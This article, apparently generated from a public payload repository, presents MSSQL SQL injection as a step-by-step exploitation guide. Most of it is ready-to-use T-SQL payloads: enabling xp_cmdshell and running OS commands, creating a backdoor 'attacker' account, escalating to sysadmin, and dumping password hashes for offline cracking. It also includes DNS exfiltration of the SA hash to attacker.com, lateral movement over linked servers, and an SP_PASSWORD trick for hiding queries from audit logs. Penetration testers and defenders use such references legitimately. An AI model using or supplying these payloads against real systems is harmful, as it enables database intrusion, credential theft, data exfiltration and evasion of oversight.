MSSQL Specific SQL Injection Payloads: Complete T-SQL Exploitation Guide
The PayloadsAllTheThings repository catalogs comprehensive MSSQL-specific SQL injection payloads covering enumeration, union-based extraction, error-based leakage, time-based blind detection, stacked query execution, and post-exploitation techniques including OS command execution via xp_cmdshell and credential dumping from master..sysxlogins.
When penetration testers encounter Microsoft SQL Server backends, they require specialized T-SQL syntax to exploit injection vulnerabilities effectively. The swisskyrepo/PayloadsAllTheThings repository serves as the definitive reference for MSSQL specific SQL injection payloads, organizing techniques from basic enumeration to advanced out-of-band data exfiltration in the file SQL Injection/MSSQL Injection.md.
Comment Syntax and Query Termination
MSSQL supports multiple comment styles that allow attackers to truncate existing queries and append malicious T-SQL. According to the source code analysis, these syntax variations bypass naive input filters by terminating statements early or hiding payload components.
Line comments use double hyphens (--) which require a trailing space or require the next character to be non-alphanumeric. Block comments use /* … */ syntax to embed payloads within seemingly benign syntax. Additionally, the null byte sequence ;%00 can truncate queries in certain web application configurations.
' OR 1=1--
' OR 1=1/*
';%00
Enumeration Payloads for MSSQL Reconnaissance
Before exploitation, attackers must map the database architecture. The repository documents specific system variables and functions in SQL Injection/MSSQL Injection.md that reveal server configuration and privilege levels.
Query these built-in functions to establish a baseline:
SELECT @@version; -- Database version and patch level
SELECT DB_NAME(); -- Current database context
SELECT HOST_NAME(); -- Server hostname
SELECT CURRENT_USER; -- Active database principal
SELECT SYSTEM_USER; -- Underlying OS account
SELECT IS_SRVROLEMEMBER('sysadmin'); -- Check sysadmin status (returns 1 if true)
Data Extraction Methodologies
Union-Based Injection
Union-based attacks merge attacker-controlled result sets with legitimate query outputs. MSSQL requires matching data types and column counts between the original query and the injected UNION SELECT statement.
Extract password hashes from the legacy sysxlogins table:
' UNION SELECT NULL, name, master.dbo.fn_varbintohexstr(password), NULL FROM master..sysxlogins--
Error-Based Data Leakage
When application error messages are displayed but direct output is suppressed, error-based techniques force type conversion errors to leak data. The repository highlights the CONVERT() function to trigger integer conversion failures on string concatenations.
AND 1337=CONVERT(INT,(SELECT '~'+(SELECT @@version)+'~'))--
This payload forces MSSQL to attempt converting the concatenated version string to an integer, causing the server to return the full version number within the error message.
Boolean-Based Blind Detection
In environments where error messages are suppressed, blind SQL injection uses boolean conditions to infer data bit-by-bit. The source documents LEN() and SUBSTRING() functions to test character lengths and values sequentially.
Test if the first password hash contains 32 characters:
AND LEN((SELECT TOP 1 password FROM master..sysxlogins))=32--
Time-Based Confirmation
Time-based blind injection induces measurable delays using WAITFOR DELAY to confirm true/false conditions without visual output. This technique works even when the application returns identical HTTP responses for both states.
'; IF (SELECT IS_SRVROLEMEMBER('sysadmin'))=1 WAITFOR DELAY '0:0:10'--
If the current user possesses sysadmin privileges, the server pauses for ten seconds before responding.
Advanced Exploitation: Stacked Queries and Command Execution
MSSQL supports stacked queries (multiple statements separated by semicolons), enabling arbitrary configuration changes and command execution. The repository details the specific sequence required to enable xp_cmdshell, a stored procedure that executes operating system commands.
Enable command execution capabilities:
'; EXEC sp_configure 'show advanced options',1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE--
Execute OS commands with full system privileges:
EXEC master.dbo.xp_cmdshell 'whoami';
EXEC master.dbo.xp_cmdshell 'net user attacker P@ssword /add';
For SQL Server 2016 and later, the repository also documents sp_execute_external_script as an alternative command execution vector using Python or R scripts when xp_cmdshell is disabled.
Post-Exploitation Techniques
File System Manipulation
Attackers can read arbitrary files using OPENROWSET with the BULK provider or write files via OLE Automation procedures. The SQL Injection/MSSQL Injection.md file catalogs these techniques for web shell deployment and configuration harvesting.
Read the Windows boot configuration:
SELECT BulkColumn FROM OPENROWSET(BULK 'C:\Windows\win.ini', SINGLE_CLOB) AS x;
Out-of-Band Data Exfiltration
Out-of-band (OOB) techniques bypass network restrictions by forcing the database server to initiate external connections. The repository documents DNS exfiltration using extended event file targets and UNC path resolution.
Exfiltrate the SA password hash via DNS lookup:
1 AND EXISTS(SELECT * FROM fn_xe_file_target_read_file('C:\*.xel','\\'+ (SELECT password FROM master..syslogins WHERE name='sa') +'.attacker.com\log.xel',NULL,NULL))--
Lateral Movement via Trusted Links
MSSQL linked servers enable trusted link exploitation for lateral movement across database instances. Attackers can execute queries or commands on remote hosts by targeting linked server objects.
Execute commands on a linked server named LinkedServer:
EXEC('EXEC master..xp_cmdshell ''net user attacker P@ssword /add''') AT LinkedServer;
Privilege Escalation
The repository documents direct role assignment using sp_addsrvrolemember to escalate database users to sysadmin status:
EXEC master.dbo.sp_addsrvrolemember 'attacker','sysadmin';
Credential Dumping
Extract password hashes from master..sysxlogins or sys.sql_logins for offline cracking. The fn_varbintohexstr function converts binary hash values to hexadecimal strings compatible with Hashcat (mode 131).
SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins;
Operational Security for MSSQL Attacks
The OPSEC section in SQL Injection/MSSQL Injection.md describes techniques to minimize forensic footprints. Prepending payloads with SP_PASSWORD prevents MSSQL from logging the query text to audit trails, as the server treats these as password-related operations and omits them from standard traces.
SP_PASSWORD; EXEC master.dbo.xp_cmdshell 'whoami';
Summary
- MSSQL specific SQL injection payloads require T-SQL syntax knowledge, utilizing system functions like
@@version,DB_NAME(), andIS_SRVROLEMEMBER()for initial reconnaissance. - Union-based extraction demands data type alignment, while error-based techniques leverage
CONVERT()failures to leak data through exception messages. - Blind and time-based methods use
WAITFOR DELAYand boolean logic to infer information when direct output is unavailable. - Stacked queries enable configuration changes and
xp_cmdshellactivation for operating system command execution. - Out-of-band exfiltration via
fn_xe_file_target_read_fileand DNS lookups bypasses network egress restrictions. - Trusted links facilitate lateral movement across SQL Server instances using the
AT LinkedServersyntax. - Credential dumping from
master..sysxloginscombined withfn_varbintohexstr()produces Hashcat-compatible hashes for offline cracking.
Frequently Asked Questions
What distinguishes MSSQL injection payloads from MySQL or PostgreSQL techniques?
MSSQL injection payloads rely on Transact-SQL (T-SQL) syntax including WAITFOR DELAY for time-based detection, stacked queries separated by semicolons, and system stored procedures like xp_cmdshell that have no direct equivalent in MySQL. The master database contains critical system tables like sysxlogins that differ from MySQL's mysql.user table structure.
How do you enable command execution via SQL injection in MSSQL?
You must first enable advanced options and then activate xp_cmdshell using a stacked query sequence: EXEC sp_configure 'show advanced options',1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE. Once enabled, EXEC master.dbo.xp_cmdshell 'command' executes arbitrary operating system commands.
Which technique works best for blind MSSQL injection without error output?
Time-based blind injection using WAITFOR DELAY '0:0:5' is the most reliable method when error messages are suppressed and union-based extraction fails. Boolean-based blind techniques using AND LEN((SELECT ...))=X also work but require more requests to enumerate data character-by-character.
How can attackers exfiltrate data when outbound HTTP traffic is blocked?
Out-of-band (OOB) techniques force the MSSQL server to resolve DNS names or access UNC paths containing sensitive data. The repository documents using fn_xe_file_target_read_file with a UNC path like \\attacker.com\log.xel or the master.dbo.dnscmd equivalent to tunnel data through DNS queries, bypassing firewall restrictions on HTTP/HTTPS traffic.
Have a question about this repo?
These articles cover the highlights, but your codebase questions are specific. Give your agent direct access to the source. Share this with your agent to get started:
curl -s "https://instagit.com/install.md" Maintain an open-source project? Get it listed too →